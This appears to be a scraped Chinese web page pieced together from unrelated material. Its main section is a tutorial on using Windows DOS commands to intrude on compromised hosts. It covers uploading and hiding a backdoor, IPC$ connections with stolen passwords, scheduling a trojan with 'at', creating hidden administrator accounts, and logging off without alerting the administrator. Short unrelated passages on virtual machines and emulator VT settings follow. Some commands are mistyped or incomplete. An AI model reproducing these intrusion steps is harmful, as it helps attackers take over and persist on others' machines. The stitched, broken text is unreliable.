hkj是什麼伺服器

1. 入門DOS命令

大家在入侵時,一定會用到DOS命令的,它的功能非常的強大.今天我就對常用的DOS命令作個詳細的解說.主要是給剛入門者和接觸DOS命令少的朋友看的.下面我挑幾個比較常用的給大家說說.
以windows2000為例,windows xp類同.

DIR
顯示當前盤下的所有文件夾和文件.
比較常用的方法是,你上傳一個後門或服務端(這兒比如名字叫systems.exe)到肉雞的c:\winnt\system32下,你想看看有沒有上傳成功.可以用DIR命令看一下. 命令如下 :

DIR c:\winnt\system32\systems.exe

則會顯示:
2004-05-24 20:06 194,762 systems.exe
1 個文件 194,762 位元組
0 個目錄 4,658,597,888 可用位元組

如果你沒有上傳成功,則顯示如下:
驅動器 C 中的卷沒有標簽。
卷的序列號是 6458-3DB8
c:\winnt\system32\的目錄
找不到文件

CD
改變當前目錄
具體看一下下面的命令:
C:\>cd winnt //進入winnt文件夾

C:\winnt>cd system32 //進入system32 文件夾

C:\winnt\system32>cd.. //回到上一級目錄

C:\winnt>cd..

C:\>
C:\>d: //進入D盤

D:\>e: //進入E盤

E:\>

del和deltree
DEL:刪除文件.
看下面的命令:
C:\>del c:\xx\ww.txt //刪除C盤的XX目錄下的名叫WW的文件.

C:\>
C:\>del c:\xx\*.* //刪除C盤的XX目錄下所有文件

deltree
這個更具有破壞性,不但能刪除所有文件,連文件夾也刪除

C:\>deltree c:\winnt //刪除C盤下的winnt所有文件和文件夾.
這個大家要小心使用.

attrid
顯示和更改文件或文件夾屬性.
文件或文件夾的屬性有 隱藏,用字母H表示. 只讀,用R表示. 存檔,用A表示. 系統,用S表示
改變一個文件或文件夾屬性, " + " 表示增加, " - ",表示去掉某個屬性.
平時我們都把後門或服務端到上傳肉雞的c:\winnt\system32下.在進入了肉雞的CMD以後,為了更加的不讓肉雞管理員知道,我們可以把你上傳的隱藏起來.比如還是上面的systems.exe
命令如下:
C:\>attrid +h c:\winnt\system32\systems.exe //這樣在system32下就找不到systems.exe

C:\>attrid -h c:\winnt\system32\systems.exe //去掉systems.exe的隱藏屬性


復制一個或多個文件到其它目錄
比如你把C盤下一個叫1.txt文件復制到D盤的vv文件夾下,

C:\> c:\1.txt d:\vv\1.exe

比如你和肉雞建立了IPC$連接(如何連接?以後會講的),而且肉雞開放了共享,這里比如開放了D盤.你可以把你C盤下的一個叫systems.exe的後門或服務端上傳肉雞的D盤下,命令如下:

C:\> c:\systems.exe \\肉雞IP\d$

type
顯示文件內容
我現在在我的C盤的XX目錄下新建一個叫hack.txt的文件,內容是一些台灣的IP
命令如下:

C:\>type c:\xx\hack.txt
序號 開始IP地址 結束IP地址 國家/省/直轄市 城市/區縣/組織
58 024.179.140.000 024.179.150.255 中國台灣省
80 061.013.000.000 061.013.255.255 中國台灣省
86 061.058.065.000 061.058.070.255 中國台灣省
87 061.059.160.000 061.059.255.255 中國台灣省
89 061.070.100.000 061.070.150.255 中國台灣省
1788 061.217.179.000 061.217.179.255 中國台灣省 台南市
1789 061.216.000.000 061.219.255.255 中國台灣省
1790 061.220.080.000 061.220.150.255 中國台灣省 台北市
1791 061.224.000.000 061.224.255.255 中國台灣省 台北市
1792 061.225.000.000 061.225.255.255 中國台灣省
3390 134.208.000.000 134.208.255.255 中國台灣省
3584 139.175.000.000 139.175.255.255 中國台灣省
3590 140.092.000.000 140.092.255.255 中國台灣省
3593 140.096.000.000 140.096.255.255 中國台灣省
3596 140.112.000.000 140.112.255.255 中國台灣省 台灣大學
C:\>

它還有一個用法,就是在進入肉雞的CMD以後,看看肉雞用的是什麼操作系統,命令如下,在我電腦操作的結果如下:

C:\>type c:\boot.ini

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft WindowsXP Professional"
/fastdetect

看出來沒有?,我用的是XP系統.

這是一些我認為常用的命令,其它的還有rd,md等.你們有興趣可以找資料看看.平進比較少用.

ping
這個是用的最多的命令.可是現在好像不靈光了.大多數網站和個人電腦用防火牆屏蔽了ping.大多數時候根本是P不通.基本命令:
ping ip
ping 網址

下面P的是本站:

C:\>ping www.hf110.com

Pinging www.hf110.com [218.89.0.231] with 32 bytes of data:

Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Reply from 218.89.0.231: bytes=32 time=66ms TTL=116
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116

Ping statistics for 218.89.0.231:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 66ms, Maximum = 67ms, Average = 66ms

上面P出本站的IP是218.89.0.231,從TTL=116.大略看出使用的是windows操作系統.一般來說TTL值在128左右的是windows操作系統,值在225左右的,大多數是unix類系統.但是還有特殊情況,管理員可能會通過改注冊表來修改TTL值.

net use
在得到肉雞的用戶名和密碼這後,可以用這個命令做IPC$連接

net use \\肉雞ip\ipc$ "密碼" /user:"用戶名"

連接成功後,上傳後門或服務端,(比如叫systems.exe,在你的D盤下).

D:\systems.exe \\肉雞ip\c$ //這里它要開放共享,你才能上傳.否則無法上傳成功.

net time \\肉雞ip //看一下肉雞的時間,是24小時制.比如這兒是下午3點10分.寫作15:10

at \\肉雞ip 15:12 systems.exe //在15:12分,運行systems.exe

在這兒,你上傳的是反彈木馬的話,可以等著它來連接你.其實在入侵過程中,有很多的偶然性,比如上面的,你可以IPC連接成功.但是並一定能夠通過net time \\肉雞ip ,看肉雞時間.就算能看到時間吧,有時肉雞的at服務並沒有打開.就算打開了,但是後門或服務端不一定能夠有機會運行,
可能被殺毒軟體查殺.所以在入侵過程中,失敗是常有的事.這個方法不行,可以另一種.

net user
查看用戶或新建一個用戶.
這是在我電腦上的截圖

C:\>net user

\\BILLGATES 的用戶帳戶

---------------------------------------------------------------------
Guest guest1 HelpAssistant
SUPPORT_388945a0 yhkj
命令成功完成。

C:\>

上面是我所有的用戶.
現在我新建一個setwell的用戶,密碼是123456, 截圖如下

C:\>net user setwell 123456 /add
命令成功完成。

C:\>net localgroup administrators setwell /add //這條命令是加setwell為管理員
命令成功完成。

接下來我們再net user ,載圖如下

C:\>net user

\\BILLGATES 的用戶帳戶

----------------------------------------------------------------
Guest guest1 HelpAssistant
setwell SUPPORT_388945a0 yhkj
命令成功完成。

建立的用戶可以用net user命令看到,我們在用戶後面加個$,可以小小的隱藏一下.這次建一個叫set的用戶,截圖如下:

C:\>net user set$ 123456 /add
命令成功完成。

C:\>net localgroup administrators set$ /add
命令成功完成。

C:\>net user

\\BILLGATES 的用戶帳戶

-----------------------------------------------------------------
Guest guest1 HelpAssistant
setwell SUPPORT_388945a0 yhkj
命令成功完成。

C:\>

看到沒有,我們沒有看到剛才建立的用戶set$,可以用這個命令看,net localgroup administrators ,這個命令的是顯示所有的管理員,截圖如下:

C:\>net localgroup administrators
別名 administrators
注釋 管理員對計算機/域有不受限制的完全訪問權

成員

------------------------------------------------------
guest1
set$
setwell
yhkj
命令成功完成。

C:\>

看到沒有,我們看到set$這個用戶了.

如果要刪除用戶用這個命令:

C:\>net user setwell /delete

net start
1.啟動某些服務
比如: net start telnet //啟動telnet服務

2.查看當前啟動了什麼服務.看看我的電腦啟動了什麼服務:

C:\>net start
已經啟動以下 Windows 服務:

Automatic Updates
COM+ Event System
Cryptographic Services
DHCP Client
Distributed Link Tracking Client
DNS Client
Error Reporting Service
Event Log
Help and Support
IPSEC Services
Logical Disk Manager
Messenger

這只是一部分服務.

net stop
停止某些服務.站長今天也說到了.我不多了.

net share
查看默認共享.也就是查看這些共享C$ D$ e$ f$ admin$ ipc$,這是系統默認的.我的全部關了,我
到肉雞上截張圖吧.

C:\Documents and Settings\Administrator>net share
D$ D:\ 默認共享
F$ F:\ 默認共享
ADMIN$ C:\WINNT 遠程管理
C$ C:\ 默認共享
E$ E:\ 默認共享
命令成功完成。

C:\Documents and Settings\Administrator>

這個肉雞的IPC$共享竟然關了.

net view
也是查看共享,但不是上面的默認共享了,還是來張截圖吧.也是肉雞的,

C:\Documents and Settings\Administrator>net view
伺服器名稱 注釋

-------------------------------------------------------------------------------
\\17
\\HMZ
\\ZGH
命令成功完成。

C:\Documents and Settings\Administrator>

學DOS命令看起來有點煩,其實是挺容易學的.而且學好了,在入侵中,會起到舉足輕重的作用.下次講netstat 等命令.

netstat -an
使用這個命令可以察看到和本機的所有的連接.看一下在我電腦上的截圖,

D:\>netstat -an

Active Connections

Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1029 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5000 0.0.0.0:0 LISTENING
TCP 180.254.158.42:139 0.0.0.0:0 LISTENING
TCP 218.95.49.187:2935 218.89.0.231:80 ESTABLISHED
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:1035 *:*
UDP 0.0.0.0:1037 *:*
UDP 0.0.0.0:1134 *:*
UDP 0.0.0.0:1136 *:*

Proto Local Address Foreign Address State
協議 本地埠及IP地址 遠程埠及IP地址 狀態

LISTENING 監聽狀態 表示等待對方連接

ESTABLISHED 正在連接著.

TCP 協議是TCP

UDP 協議是UDP

TCP 218.95.49.187:2935 218.89.0.231:80 ESTABLISHED
這個表示 利用tcp協議 本機ip(218.95.49.187通過埠:2935 和遠程ip(218.89.0.231)埠:80連接

query
這個命令只有在開了3389埠(也不一定埠是3389,說不定改成別的埠了.嚴格講應是開了遠程終端服務)的機子,才能用上.我用1$的用戶名上了一台3389機子,看一下截圖:

c:\>query user
USERNAME SESSIONNAME ID STATE
administrator console 0 運行中
1$ rdp-tcp#2 1 運行中

看到上面沒有,管理員也在,如果你要退出的話,就用如下命令:

logoff ID 這兒是logoff 1.

這是正常退出的.說到退出,還有一個辦法,就是在開始---關機---注銷1$.如果你用另外的方法退出的話,那麼肉雞在關機時,會出現類如"有一個其它客人登錄到這台伺服器,如果你退出,對方的會話數據會丟失"一類的話.這樣管理員就會發現了.

2. 虛擬機是什麼

虛擬機指通過軟體模擬的具有完整硬體系統功能的、運行在一個完全隔離環境中的完整計算機系統。

虛擬系統通過生成現有操作系統的全新虛擬鏡像，它具有真實windows系統完全一樣的功能，進入虛擬系統後，所有操作都是在這個全新的獨立的虛擬系統裡面進行，可以獨立安裝運行軟體。

保存數據，擁有自己的獨立桌面，不會對真正的系統產生任何影響 ，而且具有能夠在現有系統與虛擬鏡像之間靈活切換的一類操作系統。

(2)hkj是什麼伺服器擴展閱讀：

虛擬機的用處：

1、演示環境，可以安裝各種演示環境，便於做各種例子。

2、保證主機的快速運行，減少不必要的垃圾安裝程序，偶爾使用的程序，或者測試用的程序在虛擬機上運行。

3、避免每次重新安裝，銀行等常用工具，不經常使用，而且要求保密比較好的，單獨在一個環境下面運行。

4、想測試一下不熟悉的應用，在虛擬機中隨便安裝和徹底刪除。

5、體驗不同版本的操作系統，如Linux、Mac等。

3. 模擬器開VT有什麼好處和壞處

開VT的好處就是安卓模擬器能夠得到更多的資源來運行游戲，為了游戲玩的爽，可以認為安卓模擬器是必須開VT的。而且VT沒有壞處。

因此開啟VT功能就會更好利用處理器的資源，發揮出電腦設備的全部作用，這項技術並不會對電腦設備帶來壞的影響，能夠支持VT功能反而表明你的設備足夠先進，因為這項技術的普及是近幾年的事情。